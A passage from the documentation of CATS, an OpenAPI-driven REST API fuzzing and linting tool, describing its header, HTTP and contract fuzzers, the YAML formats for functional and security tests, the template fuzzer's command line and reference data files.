• TrailingWhitespacesInHeadersFuzzer - iterate through each header and trail values with unicode separators
• UnsupportedAcceptHeadersFuzzer - send a request with an unsupported Accept header and expect to get 406 code
• UnsupportedContentTypesHeadersFuzzer - send a request with an unsupported Content-Type header and expect to get 415 code
• ZalgoTextInHeadersFuzzer - iterate through each header and send requests with zalgo text in the targeted header

You can run only these Fuzzers by supplying the --checkHeaders argument.

HTTP Fuzzers

CATS has currently 6 registered HTTP Fuzzers:

• BypassAuthenticationFuzzer - check if an authentication header is supplied; if yes try to make requests without it
• DummyRequestFuzzer - send a dummy json request {'cats': 'cats'}
• HappyFuzzer - send a request with all fields and headers populated
• HttpMethodsFuzzer - iterate through each undocumented HTTP method and send an empty request
• MalformedJsonFuzzer - send a malformed json request which has the String 'bla' at the end
• NonRestHttpMethodsFuzzer - iterate through a list of HTTP method specific to the WebDav protocol that are not expected to be implemented by REST APIs

You can run only these Fuzzers by supplying the --checkHttp argument.

ContractInfo Fuzzers or OpenAPI Linters

Usually a good OpenAPI contract must follow several good practices in order to make it easy digestible by the service clients and act as much as possible as self-sufficient documentation:

• follow good practices around naming the contract elements like paths, requests, responses
• always use plural for the path names, separate paths words through hyphens/underscores, use camelCase or snake_case for any json types and properties
• provide tags for all operations in order to avoid breaking code generation on some languages and have a logical grouping of the API operations
• provide good description for all paths, methods and request/response elements
• provide meaningful responses for POST, PATCH and PUT requests
• provide examples for all requests/response elements
• provide structural constraints for (ideally) all request/response properties (min, max, regex)
• heaver some sort of CorrelationIds/TraceIds within headers
• have at least a security schema in place
• avoid having the API version part of the paths
• document response codes for both "happy" and "unhappy" flows
• avoid using xml payload unless there is a really good reason (like documenting an old API for example)
• json types and properties do not use the same naming (like having a Pet with a property named pet)

CATS has currently 9 registered ContractInfo Fuzzers:

• HttpStatusCodeInValidRangeFuzzer - verifies that all HTTP response codes are within the range of 100 to 599
• NamingsContractInfoFuzzer - verifies that all OpenAPI contract elements follow REST API naming good practices
• PathTagsContractInfoFuzzer - verifies that all OpenAPI paths contain tags elements and checks if the tags elements match the ones declared at the top level
• RecommendedHeadersContractInfoFuzzer - verifies that all OpenAPI contract paths contain recommended headers like: CorrelationId/TraceId, etc.
• RecommendedHttpCodesContractInfoFuzzer - verifies that the current path contains all recommended HTTP response codes for all operations
• SecuritySchemesContractInfoFuzzer - verifies if the OpenApi contract contains valid security schemas for all paths, either globally configured or per path
• TopLevelElementsContractInfoFuzzer - verifies that all OpenAPI contract level elements are present and provide meaningful information: API description, documentation, title, version, etc.
• VersionsContractInfoFuzzer - verifies that a given path doesn't contain versioning information
• XmlContentTypeContractInfoFuzzer - verifies that all OpenAPI contract paths responses and requests does not offer application/xml as a Content-Type

You can run only these Fuzzers using > cats lint --contract=CONTRACT.

Special Fuzzers

FunctionalFuzzer

Writing Custom Tests

You can leverage CATS super-powers of self-healing and payload generation in order to write functional tests. This is achieved using the so called FunctionaFuzzer, which is not a Fuzzer per se, but was named as such for consistency. The functional tests are written in a YAML file using a simple DSL. The DSL supports adding identifiers, descriptions, assertions as well as passing variables between tests. The cool thing is that, by leveraging the fact that CATS generates valid payload, you only need to override values for specific fields. The rest of the information will be populated by CATS using valid data, just like a 'happy' flow request.

It's important to note that reference data won't get replaced when using the FunctionalFuzzer. So if there are reference data fields, you must also supply those in the FunctionalFuzzer.

The FunctionalFuzzer will only trigger if a valid functionalFuzzer.yml file is supplied. The file has the following syntax:

/path:
    testNumber:
        description: Short description of the test
        prop: value
        prop#subprop: value
        prop7:
          - value1
          - value2
          - value3
        oneOfSelection:
          element#type: "Value"
        expectedResponseCode: HTTP_CODE
        httpMethod: HTTP_NETHOD

And a typical run will look like:

> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080

This is a description of the elements within the functionalFuzzer.yml file:

• you can supply a description of the test. This will be set as the Scenario description. If you don't supply a description the testNumber will be used instead.
• you can have multiple tests under the same path: test1, test2, etc.
• expectedResponseCode is mandatory, otherwise the Fuzzer will ignore this test. The expectedResponseCode tells CATS what to expect from the service when sending this test.
• at most one of the properties can have multiple values. When this situation happens, that test will actually become a list of tests one for each of the values supplied. For example in the above example prop7 has 3 values. This will actually result in 3 tests, one for each value.
• test within the file are executed in the declared order. This is why you can have outputs from one test act as inputs for the next one(s) (see the next section for details).
• if the supplied httpMethod doesn't exist in the OpenAPI given path, a warning will be issued and no test will be executed
• if the supplied httpMethod is not a valid HTTP method, a warning will be issued and no test will be executed
• if the request payload uses a oneOf element to allow multiple request types, you can control which of the possible types the FunctionalFuzzer will apply to using the oneOfSelection keyword. The value of the oneOfSelection keyword must match the fully qualified name of the discriminator.
• if no oneOfSelection is supplied, and the request payload accepts multiple oneOf elements, than a custom test will be created for each type of payload
• the file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example above instead of .

Dealing with oneOf, anyOf

When you have request payloads which can take multiple object types, you can use the oneOfSelection keyword to specify which of the possible object types is required by the FunctionalFuzzer. If you don't provide this element, all combinations will be considered. If you supply a value, this must be exactly the one used in the discriminator.

Correlating Tests

As CATs mostly relies on generated data with small help from some reference data, testing complex business scenarios with the pre-defined Fuzzers is not possible. Suppose we have an endpoint that creates data (doing a POST), and we want to check its existence (via GET). We need a way to get some identifier from the POST call and send it to the GET call. This is now possible using the FunctionalFuzzer. The functionalFuzzerFile can have an output entry where you can state a variable name, and its fully qualified name from the response in order to set its value. You can then refer the variable using ${variable_name} from another test in order to use its value.

Here is an example:

/pet:
    test_1:
      description: Create a Pet
      httpMethod: POST
      name: "My Pet"
      expectedResponseCode: 200
      output:
        petId: pet#id
/pet/{id}:
    test_2:
      description: Get a Pet
      id: ${petId}
      expectedResponseCode: 200

Suppose the test_1 execution outputs:

{
  "pet": 
    { 
      "id" : 2
    }
}

When executing test_1 the value of the pet id will be stored in the petId variable (value 2). When executing test_2 the id parameter will be replaced with the petId variable (value 2) from the previous case.

Please note: variables are visible across all custom tests; please be careful with the naming as they will get overridden.

Verifying responses

The FunctionalFuzzer can verify more than just the expectedResponseCode. This is achieved using the verify element. This is an extended version of the above functionalFuzzer.yml file.

/pet:
    test_1:
      description: Create a Pet
      httpMethod: POST
      name: "My Pet"
      expectedResponseCode: 200
      output:
        petId: pet#id
      verify:
        pet#name: "Baby"
        pet#id: "[0-9]+"
/pet/{id}:
    test_2:
      description: Get a Pet
      id: ${petId}
      expectedResponseCode: 200

Considering the above file:

• the FunctionalFuzzer will check if the response has the 2 elements pet#name and pet#id
• if the elements are found, it will check that the pet#name has the Baby value and that the pet#id is numeric

The following json response will pass test_1:

{
  "pet": 
    { 
      "id" : 2,
      "name": "Baby"
    }
}

But this one won't (pet#name is missing):

{
  "pet": 
    { 
      "id" : 2
    }
}

You can also refer to request fields in the verify section by using the ${request#..} qualifier. Using the above example, by having the following verify section:

/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id
    verify:
      pet#name: "${request#name}"
      pet#id: "[0-9]+"

It will verify if the response contains a pet#name element and that its value equals My Pet as sent in the request.

Some notes:

• verify parameters support Java regexes as values
• you can supply more than one parameter to check (as seen above)
• if at least one of the parameters is not present in the response, CATs will report an error
• if all parameters are found and have valid values, but the response code is not matched, CATs will report a warning
• if all the parameters are found and match their values, and the response code is as expected, CATs will report a success

Working with additionalProperties in FunctionalFuzzer

You can also set additionalProperties fields through the functionalFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.

FunctionalFuzzer Reserved keywords

The following keywords are reserved in FunctionalFuzzer tests: output, expectedResponseCode, httpMethod, description, oneOfSelection, verify, additionalProperties, topElement and mapValues.

Security Fuzzer

Although CATs is not a security testing tool, you can use it to test basic security scenarios by fuzzing specific fields with different sets of nasty strings. The behaviour is similar to the FunctionalFuzzer. You can use the exact same elements for output variables, test correlation, verify responses and so forth, with the addition that you must also specify a targetFields and/or targetFieldTypes and a stringsList element. A typical securityFuzzerFile will look like this:

/pet:
    test_1:
      description: Run XSS scenarios
      name: "My Pet"
      expectedResponseCode: 200
      httpMethod: all
      targetFields:
        - pet#id
        - pet#description
      stringsFile: xss.txt

And a typical run:

> cats run securityFuzzerFile.yml -c contract.yml -s http://localhost:8080

You can also supply output, httpMethod, oneOfSelection and/or verify (with the same behaviour as within the FunctionalFuzzer) if they are relevant to your case.

The file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example instead of ..

This is what the SecurityFuzzer will do after parsing the above securityFuzzerFile:

• it will add the fixed value "My Pet" to all the request for the field name
• for each field specified in the targetFields i.e. pet#id and pet#description it will create requests for each line from the xss.txt file and supply those values in each field
• if you consider the xss.txt sample file included in the CATs repo, this means that it will send 21 requests targeting pet#id and 21 requests targeting pet#description i.e. a total of 42 tests
• for each of these 42 tests, the SecurityFuzzer will expect a 200 response code. If another response code is returned, then CATs will report the test as error.

If you want the above logic to apply to all paths, you can use all as the path name:

all:
    test_1:
      description: Run XSS scenarios
      name: "My Pet"
      expectedResponseCode: 200
      httpMethod: all
      targetFields:
        - pet#id
        - pet#description
      stringsFile: xss.txt

Instead of specifying the field names, you can broader to scope to target certain fields types. For example, if we want to test for XSS in all string fields, you can have the following securityFuzzerFile:

all:
    test_1:
      description: Run XSS scenarios
      name: "My Pet"
      expectedResponseCode: 200
      httpMethod: all
      targetFieldTypes:
        - string
      stringsFile: xss.txt

As an idea on how to create security tests, you can split the nasty strings into multiple files of interest in your particular context. You can have a sql_injection.txt, a xss.txt, a command_injection.txt and so on. For each of these files, you can create a test entry in the securityFuzzerFile where you include the fields you think are meaningful for these types of tests. (It was a deliberate choice (for now) to not include all fields by default.) The expectedResponseCode should be tweaked according to your particular context. Your service might sanitize data before validation, so might be perfectly valid to expect a 200 or might validate the fields directly, so might be perfectly valid to expect a 400. A 500 will usually mean something was not handled properly and might signal a possible bug.

Working with additionalProperties in SecurityFuzzer

You can also set additionalProperties fields through the functionalFuzzerFile using the same syntax as for Setting additionalProperties in Reference Data.

SecurityFuzzer Reserved keywords

The following keywords are reserved in SecurityFuzzer tests: output, expectedResponseCode, httpMethod, description, verify, oneOfSelection, targetFields, targetFieldTypes, stringsFile, additionalProperties, topElement and mapValues.

TemplateFuzzer

The TemplateFuzzer can be used to fuzz non-OpenAPI endpoints. If the target API does not have an OpenAPI spec available, you can use a request template to run a limited set of fuzzers. The syntax for running the TemplateFuzzer is as follows (very similar to curl:

> cats fuzz -H header=value -X POST -d '{"field1":"value1","field2":"value2","field3":"value3"}' -t "field1,field2,header" -i "2XX,4XX" http://service-url 

The command will:

• send a POST request to http://service-url
• use the {"field1":"value1","field2":"value2","field3":"value3"} as a template
• replace one by one field1,field2,header with fuzz data and send each request to the service endpoint
• ignore 2XX,4XX response codes and report an error when the received response code is not in this list

It was a deliberate choice to limit the fields for which the Fuzzer will run by supplying them using the -t argument. For nested objects, supply fully qualified names: field.subfield.

Headers can also be fuzzed using the same mechanism as the fields.

This Fuzzer will send the following type of data:

• null values
• empty values
• zalgo text
• abugidas characters
• large random unicode data
• very large strings (80k characters)
• single and multi code point emojis
• unicode control characters
• unicode separators
• unicode whitespaces

For a full list of options run > cats fuzz -h.

You can also supply your own dictionary of data using the -w file argument.

HTTP methods with bodies will only be fuzzed at the request payload and headers level.

HTTP methods without bodies will be fuzzed at path and query parameters and headers level. In this case you don't need to supply a -d argument.

This is an example for a GET request:

> cats fuzz -X GET -t "path1,query1" -i "2XX,4XX" http://service-url/paths1?query1=test&query2

Reference Data File

There are often cases where some fields need to contain relevant business values in order for a request to succeed. You can provide such values using a reference data file specified by the --refData argument. The reference data file is a YAML-format file that contains specific fixed values for different paths in the request document. The file structure is as follows:

/path/0.1/auth:
    prop#subprop: 12
    prop2: 33
    prop3#subprop1#subprop2: "test"
/path/0.1/cancel:
    prop#test: 1

For each path you can supply custom values for properties and sub-properties which will have priority over values supplied by any other Fuzzer. Consider this request payload:

{
    "address": {
        "phone": "123",
        "postCode": "408",
        "street": "cool street"    
    },
    "name": "Joe"
}

and the following reference data file file:

/path/0.1/auth:
    address#street: "My Street"
    name: "John"

This will result in any fuzzed request to the /path/0.1/auth endpoint being updated to contain the supplied fixed values:

{
    "address": {
        "phone": "123",
        "postCode": "408",
        "street": "My Street"    
    },
    "name": "John"
}

The file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example above instead of ..

You can use environment (system) variables in a ref data file using: $$VARIABLE_NAME. (notice double $$)

Setting additionalProperties

As additional properties are maps i.e. they don't actually have a structure, CATS cannot currently generate valid values. If the elements within such a data structure are essential for a request, you can supply them via the refData file using the following syntax:

/path/0.1/auth:
    address#street: "My Street"
    name: "John"
    additionalProperties:
      topElement: metadata
      mapValues:
        test: "value1"
        anotherTest: "value2"

The additionalProperties element must contain the actual key-value pairs to be sent within the requests and also a top element if needed. topElement is not mandatory. The above example will output the following json (considering also the above examples):

{
    "address": {
        "phone": "123",
        "postCode": "408",
        "street": "My Street"    
    },
    "name": "John",
    "metadata": {
        "test": "value1",
        "anotherTest": "value2"
    }   
}

RefData reserved keywords

The following keywords are reserved in a reference data file: additionalProperties, topElement and mapValues.

Sending ref data for ALL paths

You can also have the ability to send the same reference data for ALL paths (just like you do with the headers). You can achieve this by using all as a key in the refData file:

all:
  address#zip: 123

This will try to replace address#zip in all requests (if the field is present).

Removing fields

There are (rare) cases when some fields may not make sense together. Something like: if you send firstName and lastName, you are not allowed to also send name. As OpenAPI does not have the capability to send request fields which are dependent on each other, you can use the refData file to instruct CATS to remove fields before sending a request to the service. You can achieve this by using the cats_remove_field as a value for the fields you want to remove. For the above case the refData field will look as follows:

all:
  name: "cats_remove_field"

Creating a Ref Data file with the FunctionalFuzzer

You can leverage the fact that the FunctionalFuzzer can run functional flows in order to create dynamic --refData files which won't need manual setting the reference data values. The --refData file must be created with variables ${variable} instead of fixed values and those variables must be output variables in the functionalFuzzer.yml file. In order for the FunctionalFuzzer to properly replace the variables names with their values you must supply the --refData file as an argument when the FunctionalFuzzer runs.